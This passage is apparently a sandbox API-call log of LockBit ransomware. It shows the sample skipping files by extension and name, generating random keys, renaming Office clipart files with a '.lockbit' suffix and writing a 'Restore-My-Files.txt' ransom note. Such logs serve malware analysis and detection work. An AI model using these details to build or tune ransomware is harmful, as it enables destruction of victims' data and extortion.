lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.803] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.803] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.804] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090783.WMF") returned 1 [0120.804] lstrcmpiW (lpString1="ntldr", lpString2="J0090783.WMF") returned 1 [0120.804] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090783.WMF") returned 1 [0120.804] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090783.WMF") returned -1 [0120.805] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090783.WMF") returned -1 [0120.805] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090783.WMF") returned 1 [0120.805] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090783.WMF") returned -1 [0120.805] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.805] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned=".WMF" [0120.805] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.805] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.805] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.806] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.806] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.lockbit") returned 72 [0120.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0120.807] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.807] malloc (_Size=0x40068) returned 0x3d70450 [0120.807] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6934) returned 1 [0120.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0120.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0120.808] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.814] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.814] malloc (_Size=0xa6) returned 0x77d7a8 [0120.814] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.815] free (_Block=0x77d7a8) [0120.815] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.815] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.815] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa442, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0093905.WMF", cAlternateFileName="")) returned 1 [0120.815] lstrcmpiW (lpString1=".", lpString2="J0093905.WMF") returned -1 [0120.815] lstrcmpiW (lpString1="..", lpString2="J0093905.WMF") returned -1 [0120.815] PathFindExtensionW (pszPath="J0093905.WMF") returned=".WMF" [0120.815] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.815] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.816] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.816] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.817] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0093905.WMF") returned 1 [0120.817] lstrcmpiW (lpString1="ntldr", lpString2="J0093905.WMF") returned 1 [0120.817] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0093905.WMF") returned 1 [0120.817] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0093905.WMF") returned -1 [0120.817] lstrcmpiW (lpString1="autorun.inf", lpString2="J0093905.WMF") returned -1 [0120.817] lstrcmpiW (lpString1="thumbs.db", lpString2="J0093905.WMF") returned 1 [0120.818] lstrcmpiW (lpString1="iconcache.db", lpString2="J0093905.WMF") returned -1 [0120.818] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.818] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned=".WMF" [0120.818] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.818] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.818] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.819] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.819] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.lockbit") returned 72 [0120.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0120.824] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.824] malloc (_Size=0x40068) returned 0x3df0008 [0120.824] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=42050) returned 1 [0120.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.825] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.828] malloc (_Size=0xa6) returned 0x77d7a8 [0120.828] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.829] free (_Block=0x77d7a8) [0120.829] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.829] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.829] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x136a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0098497.WMF", cAlternateFileName="")) returned 1 [0120.829] lstrcmpiW (lpString1=".", lpString2="J0098497.WMF") returned -1 [0120.829] lstrcmpiW (lpString1="..", lpString2="J0098497.WMF") returned -1 [0120.829] PathFindExtensionW (pszPath="J0098497.WMF") returned=".WMF" [0120.829] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.829] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.829] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.829] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.829] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.829] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.829] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.830] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.830] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.831] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0098497.WMF") returned 1 [0120.831] lstrcmpiW (lpString1="ntldr", lpString2="J0098497.WMF") returned 1 [0120.831] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0098497.WMF") returned 1 [0120.831] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0098497.WMF") returned -1 [0120.831] lstrcmpiW (lpString1="autorun.inf", lpString2="J0098497.WMF") returned -1 [0120.831] lstrcmpiW (lpString1="thumbs.db", lpString2="J0098497.WMF") returned 1 [0120.831] lstrcmpiW (lpString1="iconcache.db", lpString2="J0098497.WMF") returned -1 [0120.831] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.831] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned=".WMF" [0120.831] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.832] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.832] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.833] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.833] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.lockbit") returned 72 [0120.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0120.833] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.834] malloc (_Size=0x40068) returned 0x3e70008 [0120.834] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4970) returned 1 [0120.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0120.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0120.835] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0120.839] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.lockbit", NtPathName=0x3d6b8e8, 